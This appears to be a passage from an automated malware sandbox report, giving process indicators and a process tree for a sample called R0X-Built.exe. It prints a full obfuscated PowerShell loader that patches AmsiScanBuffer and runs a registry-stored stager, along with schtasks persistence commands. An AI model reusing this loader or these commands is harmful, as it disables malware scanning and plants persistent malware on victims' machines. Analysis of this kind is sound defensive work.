3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exeExplorer.EXEsvchost.exe

description	pid	process
Token: SeDebugPrivilege	2816	R0X-Built.exe
Token: SeDebugPrivilege	4788	$srr-powershell.exe
Token: SeDebugPrivilege	1964	powershell.EXE
Token: SeDebugPrivilege	1964	powershell.EXE
Token: SeDebugPrivilege	3876	dllhost.exe
Token: SeShutdownPrivilege	3540	Explorer.EXE
Token: SeCreatePagefilePrivilege	3540	Explorer.EXE
Token: SeShutdownPrivilege	3540	Explorer.EXE
Token: SeCreatePagefilePrivilege	3540	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	1652	svchost.exe
Token: SeIncreaseQuotaPrivilege	1652	svchost.exe
Token: SeSecurityPrivilege	1652	svchost.exe
Token: SeTakeOwnershipPrivilege	1652	svchost.exe
Token: SeLoadDriverPrivilege	1652	svchost.exe
Token: SeSystemtimePrivilege	1652	svchost.exe
Token: SeBackupPrivilege	1652	svchost.exe
Token: SeRestorePrivilege	1652	svchost.exe
Token: SeShutdownPrivilege	1652	svchost.exe
Token: SeSystemEnvironmentPrivilege	1652	svchost.exe
Token: SeUndockPrivilege	1652	svchost.exe
Token: SeManageVolumePrivilege	1652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1652	svchost.exe
Token: SeIncreaseQuotaPrivilege	1652	svchost.exe
Token: SeSecurityPrivilege	1652	svchost.exe
Token: SeTakeOwnershipPrivilege	1652	svchost.exe
Token: SeLoadDriverPrivilege	1652	svchost.exe
Token: SeSystemtimePrivilege	1652	svchost.exe
Token: SeBackupPrivilege	1652	svchost.exe
Token: SeRestorePrivilege	1652	svchost.exe
Token: SeShutdownPrivilege	1652	svchost.exe
Token: SeSystemEnvironmentPrivilege	1652	svchost.exe
Token: SeUndockPrivilege	1652	svchost.exe
Token: SeManageVolumePrivilege	1652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1652	svchost.exe
Token: SeIncreaseQuotaPrivilege	1652	svchost.exe
Token: SeSecurityPrivilege	1652	svchost.exe
Token: SeTakeOwnershipPrivilege	1652	svchost.exe
Token: SeLoadDriverPrivilege	1652	svchost.exe
Token: SeSystemtimePrivilege	1652	svchost.exe
Token: SeBackupPrivilege	1652	svchost.exe
Token: SeRestorePrivilege	1652	svchost.exe
Token: SeShutdownPrivilege	1652	svchost.exe
Token: SeSystemEnvironmentPrivilege	1652	svchost.exe
Token: SeUndockPrivilege	1652	svchost.exe
Token: SeManageVolumePrivilege	1652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1652	svchost.exe
Token: SeIncreaseQuotaPrivilege	1652	svchost.exe
Token: SeSecurityPrivilege	1652	svchost.exe
Token: SeTakeOwnershipPrivilege	1652	svchost.exe
Token: SeLoadDriverPrivilege	1652	svchost.exe
Token: SeSystemtimePrivilege	1652	svchost.exe
Token: SeBackupPrivilege	1652	svchost.exe
Token: SeRestorePrivilege	1652	svchost.exe
Token: SeShutdownPrivilege	1652	svchost.exe
Token: SeSystemEnvironmentPrivilege	1652	svchost.exe
Token: SeUndockPrivilege	1652	svchost.exe
Token: SeManageVolumePrivilege	1652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1652	svchost.exe
Token: SeIncreaseQuotaPrivilege	1652	svchost.exe
Token: SeSecurityPrivilege	1652	svchost.exe
Token: SeTakeOwnershipPrivilege	1652	svchost.exe
Token: SeLoadDriverPrivilege	1652	svchost.exe
Token: SeSystemtimePrivilege	1652	svchost.exe
Token: SeBackupPrivilege	1652	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Conhost.exe

pid process

3628 Conhost.exe
Suspicious use of UnmapMainImage 2 IoCs

Processes:

RuntimeBroker.exeExplorer.EXE

pid process

3552 RuntimeBroker.exe
3540 Explorer.EXE

pid	process
3628	Conhost.exe

pid	process
3552	RuntimeBroker.exe
3540	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

R0X-Built.exe$srr-powershell.exepowershell.EXEcmd.exedllhost.exe

description	pid	process	target process
PID 2816 wrote to memory of 2908	2816	R0X-Built.exe	schtasks.exe
PID 2816 wrote to memory of 2908	2816	R0X-Built.exe	schtasks.exe
PID 2816 wrote to memory of 2908	2816	R0X-Built.exe	schtasks.exe
PID 2816 wrote to memory of 4788	2816	R0X-Built.exe	$srr-powershell.exe
PID 2816 wrote to memory of 4788	2816	R0X-Built.exe	$srr-powershell.exe
PID 2816 wrote to memory of 4788	2816	R0X-Built.exe	$srr-powershell.exe
PID 2816 wrote to memory of 4592	2816	R0X-Built.exe	install.exe
PID 2816 wrote to memory of 4592	2816	R0X-Built.exe	install.exe
PID 2816 wrote to memory of 4592	2816	R0X-Built.exe	install.exe
PID 2816 wrote to memory of 5016	2816	R0X-Built.exe	SCHTASKS.exe
PID 2816 wrote to memory of 5016	2816	R0X-Built.exe	SCHTASKS.exe
PID 2816 wrote to memory of 5016	2816	R0X-Built.exe	SCHTASKS.exe
PID 4788 wrote to memory of 1480	4788	$srr-powershell.exe	schtasks.exe
PID 4788 wrote to memory of 1480	4788	$srr-powershell.exe	schtasks.exe
PID 4788 wrote to memory of 1480	4788	$srr-powershell.exe	schtasks.exe
PID 4788 wrote to memory of 4884	4788	$srr-powershell.exe	cmd.exe
PID 4788 wrote to memory of 4884	4788	$srr-powershell.exe	cmd.exe
PID 4788 wrote to memory of 4884	4788	$srr-powershell.exe	cmd.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 1964 wrote to memory of 3876	1964	powershell.EXE	dllhost.exe
PID 4884 wrote to memory of 4804	4884	cmd.exe	chcp.com
PID 4884 wrote to memory of 4804	4884	cmd.exe	chcp.com
PID 4884 wrote to memory of 4804	4884	cmd.exe	chcp.com
PID 3876 wrote to memory of 612	3876	dllhost.exe	winlogon.exe
PID 3876 wrote to memory of 660	3876	dllhost.exe	lsass.exe
PID 3876 wrote to memory of 952	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 316	3876	dllhost.exe	dwm.exe
PID 3876 wrote to memory of 388	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1016	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1076	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1084	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1140	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1164	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1264	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1304	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1320	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1388	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1428	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1508	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1520	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1628	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1708	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1752	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1772	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1864	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1976	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2036	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2040	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1648	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 1652	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2132	3876	dllhost.exe	spoolsv.exe
PID 3876 wrote to memory of 2204	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2240	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2436	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2444	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2644	3876	dllhost.exe	sihost.exe
PID 3876 wrote to memory of 2652	3876	dllhost.exe	svchost.exe
PID 3876 wrote to memory of 2748	3876	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:316

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1c06a4a9-299a-421b-b111-ee2680830265}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3876

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1016

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1140

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yRbqKxkBLBGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kIKZcIrBLDkUap,[Parameter(Position=1)][Type]$EvpYPqGOXT)$mjrbchkXwDT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'elega'+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+'i'+'c'+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+'e'+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$mjrbchkXwDT.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+'e'+''+[Char](99)+''+[Char](105)+'alN'+'a'+'me'+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kIKZcIrBLDkUap).SetImplementationFlags('R'+'u'+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'ed');$mjrbchkXwDT.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+'a'+'l',$EvpYPqGOXT,$kIKZcIrBLDkUap).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $mjrbchkXwDT.CreateType();}$iBRONsafTUFNY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+'e'+''+'m'+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+'ro'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'Un'+'s'+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+'o'+''+'d'+''+[Char](115)+'');$oJJvAUUYwDZIGg=$iBRONsafTUFNY.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JtaKoZFxsTBsaboEPKR=yRbqKxkBLBGC @([String])([IntPtr]);$BAWYDgRSqOeQXiSEsdcYBc=yRbqKxkBLBGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gZeJXyUFPmq=$iBRONsafTUFNY.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$eyyMjRhtzeWSzu=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$gZeJXyUFPmq,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'bra'+[Char](114)+''+'y'+''+[Char](65)+'')));$VDdYqysrBlgErsvzZ=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$gZeJXyUFPmq,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+'o'+[Char](116)+''+'e'+'c'+[Char](116)+'')));$lowLnOk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eyyMjRhtzeWSzu,$JtaKoZFxsTBsaboEPKR).Invoke(''+[Char](97)+'m'+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$iWGxsNEFnnKyakdnz=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$lowLnOk,[Object]('A'+'m'+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$YXgOTalXiY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VDdYqysrBlgErsvzZ,$BAWYDgRSqOeQXiSEsdcYBc).Invoke($iWGxsNEFnnKyakdnz,[uint32]8,4,[ref]$YXgOTalXiY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iWGxsNEFnnKyakdnz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VDdYqysrBlgErsvzZ,$BAWYDgRSqOeQXiSEsdcYBc).Invoke($iWGxsNEFnnKyakdnz,[uint32]8,0x20,[ref]$YXgOTalXiY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+'$'+'7'+'7'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2204

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2768

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2984

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3460

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3540

C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2908

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:1480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GYL8qXV3KIzo.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2572

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:4804

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
5⤵
- Runs ping.exe
PID:2540

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2012

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSQnNVHahbdP.bat" "
6⤵
PID:732

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4736

C:\Windows\SysWOW64\chcp.com
chcp 65001
7⤵
PID:8

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:1988

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3568

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
8⤵
- Creates scheduled task(s)
PID:4080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qTabHFmwxCQs.bat" "
8⤵
PID:540

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:3872

C:\Windows\SysWOW64\chcp.com
chcp 65001
9⤵
PID:2760

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
9⤵
- Runs ping.exe
PID:4644

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
9⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3212

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
10⤵
- Creates scheduled task(s)
PID:2376

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ritNxtEkOTZf.bat" "
10⤵
PID:3616

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:4808

C:\Windows\SysWOW64\chcp.com
chcp 65001
11⤵
PID:1892

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
11⤵
- Runs ping.exe
PID:3208

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3300

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
12⤵
- Creates scheduled task(s)
PID:4036

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C8El6LET7fd1.bat" "
12⤵
PID:2108

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:2940

C:\Windows\SysWOW64\chcp.com
chcp 65001
13⤵
PID:5012

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
13⤵
- Runs ping.exe
PID:3360

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
13⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:972

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
14⤵
- Creates scheduled task(s)
PID:2952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S26TRUWfVEBU.bat" "
14⤵
PID:2416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
15⤵
PID:3340

C:\Windows\SysWOW64\chcp.com
chcp 65001
15⤵
PID:1476

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
15⤵
- Runs ping.exe
PID:1420

C:\Windows\SysWOW64\Windows\$srr-powershell.exe
"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2468

C:\Windows\SysWOW64\schtasks.exe
